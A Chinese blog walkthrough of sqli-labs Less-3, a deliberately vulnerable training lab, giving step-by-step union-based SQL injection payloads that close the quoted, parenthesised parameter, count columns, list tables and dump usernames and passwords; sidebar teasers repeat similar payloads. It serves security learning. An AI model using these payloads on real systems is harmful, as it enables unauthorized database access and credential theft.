sqli-labs全通关(1-75)之Less-3 GET - Error based - Single quotes with twist string

已于 2024-10-02 14:50:02 修改
阅读量90 收藏 2
点赞数 1
分类专栏: sqli-labs通关 文章标签: 渗透测试 SQL注入
于 2024-08-07 22:34:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/guanrongl/article/details/141002792
版权

lesson-3-GET-Error based - Single quotes with twist - String

在这里插入图片描述
在这里插入图片描述

一、判断是否存在注入点

使用单引号 ’ 判断,
在这里插入图片描述
得到报错信息,并且从报错信息上看到多了个单引号;
在这里插入图片描述

查看源代码,也可以看出id 被括号括起来;

二、判断注入类型

用减法判断,当id=1 ,结果为 Dumb
在这里插入图片描述
当id=2-1 ,得到Angelina
在这里插入图片描述
两种情况结果不一致,所以是字符型注入,同时,要注意闭合括号。

三、破解 SQL 查询语句中的字段数

使用 order by N 猜解字段数 ,记得闭合括号,

1') order by 4--+

在这里插入图片描述
order by 3 时正常显示,by 4 报错;所以字段数为 3.

四、获取当前数据库

构造union select 查询

-1') union select 1,2,database()--+

在这里插入图片描述
得到数据库名为 security

五、获取数据库中的表

构造 union select 根据库名查询表名,记得闭合右括号 )

-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = database()--+

在这里插入图片描述
得到表名:emails,referers,uagents,users

六、获取表中的字段名

以users表为例,根据表名,获取表的字段名;构造查询语句

-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name = 'users'--+

在这里插入图片描述
得到 字段名:id,username,password

七、查询到账户的数据

根据表名、字段名,构造select语句获取具体数据;

-1') union select 1,2,group_concat(id,':',username,':',password) from users--+

在这里插入图片描述

什么鬼昵称
关注
专栏目录
sqli-labs less 12 POST -Error Based - Double quotes -String -with twist
Monster1m的博客
01-19 223
一、bp开启拦截,打开十二关点击submit,bp收到拦截的报文 二、send to repeater,然后打开repeater模块 三、先输入单引号发现页面没错误,然后输入双引号发现有错误信息,可以考虑使用报错注入 四、既然双引号报错了,然后添加注释符发现还是报错,再添加一个括号,页面显示正常,则闭合方式为") uname=1")#&passwd=&submit=Submit 五、先来判断当前数据库 uname=1") and updatexml(1,concat('^',data
SQLi-Labs】Less-3 GET - Error based - Single quotes with twist
xw1995115的博客
11-15 459
与less-1、less-2原理相同,基于报错提示我们可以大致猜测后台sql逻辑,为了产生报错需要人为制造语法错误,SQL注入中常使用单引号来制造错误 ?id=1' 观察报错提示,发现除了需要封闭单引号外还需要额外封闭一个括号,因此构造以下查询 ?id=-1') union select 1,database(),user() --+ 查询被成功执行,可利用union select执行更多查询,至此本节结束 ...
SQLi-labs-Master(1-22)新手通关宝典
Myosotis_LL的博客
05-18 2361
欢迎来到《SQLi-labs-Master新手通关宝典》,本宝典专为网络安新手编写,旨在引导他们深入了解SQL注入SQLi)这一严重的安漏洞。SQL注入允许攻击者通过精心构造的输入来操纵数据库查询,从而获取、篡改或删除敏感数据。本篇将带领你从基础知识出发,逐步掌握SQL注入的原理、技术和防御策略。通过SQLi-labs等实验环境,你将有机会在真实场景中实践SQL注入攻击,并学习如何有效防御。无论你是开发人员、系统管理员、渗透测试人员还是网络安爱好者,掌握SQL注入技术都将对你大有裨益。
Sqli-labs靶场之SQL手注通关详解--基础篇(Less 1~22)
qq_62169455的博客
07-30 1068
1.判断注入点,这里的页面中没有可以注入的地方,因此可以判断注入点在url栏2.判断注入类型id=1 and 1=1 页面正常id=1 and 1=2 页面正常id=1' and 1=1 --+ 页面正常id=1' and 1=2 --+ 页面异常由此可以判断该注入类型为单引号字符型注入(当然这里也可以不用判断,根据关卡名称就可以看出来)3.判断字段数id=1' order by 3--+ 页面正常id=1' order by 4--+ 页面异常4.判断回显点。
DAY22:sqli-labs 靶场通关wp(Less01~~Less20)
qq_49433473的博客
08-04 1155
Sqli-labs靶场 1-20关通关手册,报错注入及其详细。
Sqli-labs靶场通关(1-20关)
2301_77977773的博客
07-03 546
为了不影响 80 端口的服务,我们可以设置 Apache 服务的端口为82这是因为主机本身已经存在 MySQL 服务,我们可以不使用 php-study 配置中的 MySQL,就用主机本身即可,但版本可能需要注意,我这里使用的 5.7.351.安装sqli-labs-master到phpstudy_pro中的WWW/目录下2.修改phpstudy_pro\WWW\sqli-labs-master\sql-connections的db-creds.inc文件。
[网络安]sqli-labs Less-3 解题详析
等风来
05-01 1866
以上为[网络安]sqli-labs Less-3 解题详析,后续将分享[网络安]sqli-labs Less-4 解题详析[网络安]SQL注入原理及常见攻击方法简析我是秋说,我们下次见。
Sqli-labs套(1-65)-通关笔记
TyRant的博客
04-10 4490
Basic Challenges 01-Error Based-Single quotes Error Based: 可以通过报错知道闭合方式 > paylod: ?id=1') and ;--+ 源码拼接后: SELECT * FROM users WHERE id=('$id') LIMIT 0,1; SELECT * FROM users WHERE id=('1') and ;-- ') LIMIT 0,1; > err: You have an error in your SQL
SQL注入SQLI-LABS靶场通关秘籍
Sunnie_yoo的博客
07-03 1281
反之,参数不符合规范,则会触发报错,我们就是利用这个,通过 updatexml() 函数的报错回显我们需要的信息。注入流程与 Less-5 类似,不过这里的判断标准不是回显的信息,而是响应时间。因此网页存在字符型注入漏洞,并且使用单引号和括号进行闭合,注意到此网页并没有返回任何信息,我们需要使用 Bool 盲注进行注入。注入万能密码试试,用户名随便写点东西,使用 OR 运算符构造恒真条件,使用“#”注释掉后面的内容注入,网页提示我们注入成功,由于此时使用的时单引号闭合,因此这里是字符型注入。
sqlilabs Less-3 GET-Error based - Single quotes with twist string (基于错误的GET单引号变形字符型注入)_小白鼠日常
captainLink的博客
06-10 242
sqlilabs-less3通关(小白鼠日常)
Sqli-labs靶场详细攻略Less 1-5
qq_41755084的博客
10-09 1583
Sqli-labs靶场详细攻略
sqli-labs学习笔记(四)less 11-14 post注入
闵行小鱼塘
09-07 528
继续学习sqli-labs,本篇是less11-14
Sqli-labs靶场详细攻略Less 11-16
qq_41755084的博客
10-11 651
这一关页面发生了变化,开始使用post方法传递参数。在Username字段输入1',查看错误信息。错误信息中发现password字段,基本可以确认这两个字段在同一个sql语句中联合查询。使用order by注入测试返回的参数为几列。测试到3时报错,证明返回两列。注意,这里的注释使用的是--(两个减号一个空格),而不是之前的--+。之前也提到使用加号是因为在某些http实现时会将加号转变为空格。这里使用#进行注释也是一样的。使用union select注入查询数据库名,数据库中表名。
基于Vue框架的鱿鱼导航前端开发设计源码
10-02
该项目是一款基于Vue框架开发的鱿鱼导航前端设计源码,包含122个文件,涵盖23个JavaScript文件、23个Java文件、10个PNG图片、9个Vue组件、7个CSS样式表、5个XML配置文件、4个JSON数据文件、4个YAML配置文件、4个JPG图片文件和3个Git忽略文件。该项目以HTML和CSS为基础,通过JavaScript和Vue.js实现动态交互和用户界面设计。
安徽大学在江西2020-2024各专业最低录取分数及位次表.pdf
10-02
那些年,与你同分同位次的同学都去了哪里?国各大学在江西2020-2024年各专业最低录取分数及录取位次数据,高考志愿必备参考数据
2021美赛D题参考翻译(第一版)(PDF文档)
最新发布
10-02
2021美赛D题参考翻译(第一版)(PDF文档) 【音乐影响力的量化模型】
Xshell-8.0.0057p.exe
10-02
Xshell-8.0.0057安装包
CPA 经济法 基础班 第5章 公司法律制度 股份有限公司(8)-PPT-6页.pdf
10-02
CPA 经济法 基础班 第5章 公司法律制度 股份有限公司(8)-PPT-6页.pdf
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值